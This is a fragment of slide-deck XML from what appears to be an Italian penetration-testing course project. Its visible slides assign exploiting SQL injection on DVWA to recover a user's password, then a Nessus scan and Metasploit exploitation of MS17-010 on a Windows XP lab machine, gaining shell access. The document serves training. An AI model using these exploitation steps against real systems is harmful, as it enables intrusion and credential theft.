          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9503756" y="2332299"/>
            <a:ext cx="8373803" cy="5914135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5914135" w="8373803">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8373802" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8373802" y="5914135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5914135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9691401" y="4371657"/>
            <a:ext cx="7567899" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2101899" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2101899" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="2101899">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2101899" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2101899" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="2101899" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9691401" y="6271472"/>
            <a:ext cx="7567899" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2101899" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2101899" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="2101899">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2101899" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2101899" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="2101899" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>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2338989" cy="4805174"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="16451985" cy="6406898"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="66675"/>
              <a:ext cx="16451985" cy="3039816"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="8880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="8000" spc="-240">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>Giorno 1- Web Application Exploit SQLi</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3790985"/>
              <a:ext cx="15564712" cy="2615913"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3900"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>UTILIZZANDO LE TECNICHE VISTE NELLE LEZIONE TEORICHE, SFRUTTARE LA VULNERABILITÀ SQL INJECTION PRESENTE SULLA WEB APPLICATION DVWA PER RECUPERARE IN CHIARO LA PASSWORD DELL’UTENTE PABLO PICASSO </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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5289355" y="1047750"/>
            <a:ext cx="1969945" cy="336959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>BUILD WEEK </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366595" y="2738451"/>
            <a:ext cx="9780739" cy="4870769"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4870769" w="9780739">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9780739" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9780739" y="4870769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4870769"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="496311" y="2149965"/>
            <a:ext cx="7388003" cy="598106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Una volta impostato il payload, possiamo passare alla fase d’attacco effettiva col comando “exploit”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Tramite il protocollo SAMBA avremo quindi libero accesso al sistema della macchina vittima e potremo anche avere informazioni sensibili, come la configurazione di rete col comando “ifconfig”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8366595" y="2738451"/>
            <a:ext cx="4890370" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1358245" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1358245" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="1358245">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1358245" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1358245" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1358245" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8366595" y="3715196"/>
            <a:ext cx="991906" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="275491" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="275491" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="275491">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="275491" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275491" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="275491" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9358502" y="3891876"/>
            <a:ext cx="6264277" cy="3479000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1739832" cy="966253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1739832" cy="966253"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="966253" w="1739832">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1739832" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739832" y="966253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="966253"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 14" id="14"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1739832" cy="947203"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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3781592" cy="5805514"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="18375456" cy="7740685"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="66675"/>
              <a:ext cx="18375456" cy="3039816"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="8880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="8000" spc="-240">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>Giorno 5- Exploit Windows con Metasploit</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3790985"/>
              <a:ext cx="17384448" cy="3949700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3900"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>SULLA MACCHINA WINDOWS XP CI SONO DIVERSI SERVIZI IN ASCOLTO VULNERABILI. SI RICHIEDE ALLO STUDENTE DI: </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="647700" indent="-323850" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3900"/>
                </a:lnSpc>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>EFFETTUARE UN VULNERABILITY SCANNING (BASIC SCAN) CON NESSUS SULLA MACCHINA WINDOWS XP </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="647700" indent="-323850" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3900"/>
                </a:lnSpc>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>SFRUTTARE LA VULNERABILITÀ IDENTIFICATA DAL CODICE MS17-010 CON METASPLOIT.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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5289355" y="1047750"/>
            <a:ext cx="1969945" cy="336959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>BUILD WEEK </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275847" y="2787823"/>
            <a:ext cx="9852813" cy="5002299"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5002299" w="9852813">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9852813" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9852813" y="5002299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5002299"/>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5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="433611" y="2265103"/>
            <a:ext cx="7388003" cy="598106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Al fine del corretto svolgimento dell’esercizio, prima di passare alla fase di exploit, effettuiamo un Vulnerability Scan con l’ausilio di Nessus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Dopo l’analisi, Nessus ci fornirà un report dettagliato delle eventuali criticità attive sulla macchina in questione, in questo caso Windows XP all’IP 192.168.200.200.</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403748" y="3209051"/>
            <a:ext cx="9556755" cy="3868898"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3868898" w="9556755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9556755" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9556755" y="3868898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3868898"/>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5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="416437" y="307284"/>
            <a:ext cx="7388003" cy="95815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L’analisi di Nessus ci offre una panoramica delle possibili vulnerabilità da sfruttare, tra cui quella che più interessa a noi: una vulnerabilità su accesso da remoto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Andremo, quindi, ad aprire una sessione di Metasploit sulla macchina attaccante Kali, individuando un possibile exploit che possa permetterci di sfruttare tale vulnerabilità.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
                <a:ea typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>In questo caso, dopo aver basato la nostra ricerca su una vulnerabilità di Windows nota come ms17_010, sceglieremo l’exploit n°1.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8695703" y="5247523"/>
            <a:ext cx="4854431" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1348264" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1348264" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="1348264">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1348264" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348264" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1348264" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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885497" y="1154673"/>
            <a:ext cx="8379209" cy="965785"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
